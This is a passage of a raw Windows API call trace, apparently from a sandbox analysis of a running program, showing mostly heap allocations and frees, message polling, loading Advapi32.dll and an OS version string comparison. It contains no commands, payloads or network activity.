hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.686] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0165.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.687] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.688] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.688] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0165.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.689] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.690] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0165.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.691] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0165.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.693] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.694] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.696] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.696] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.696] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: 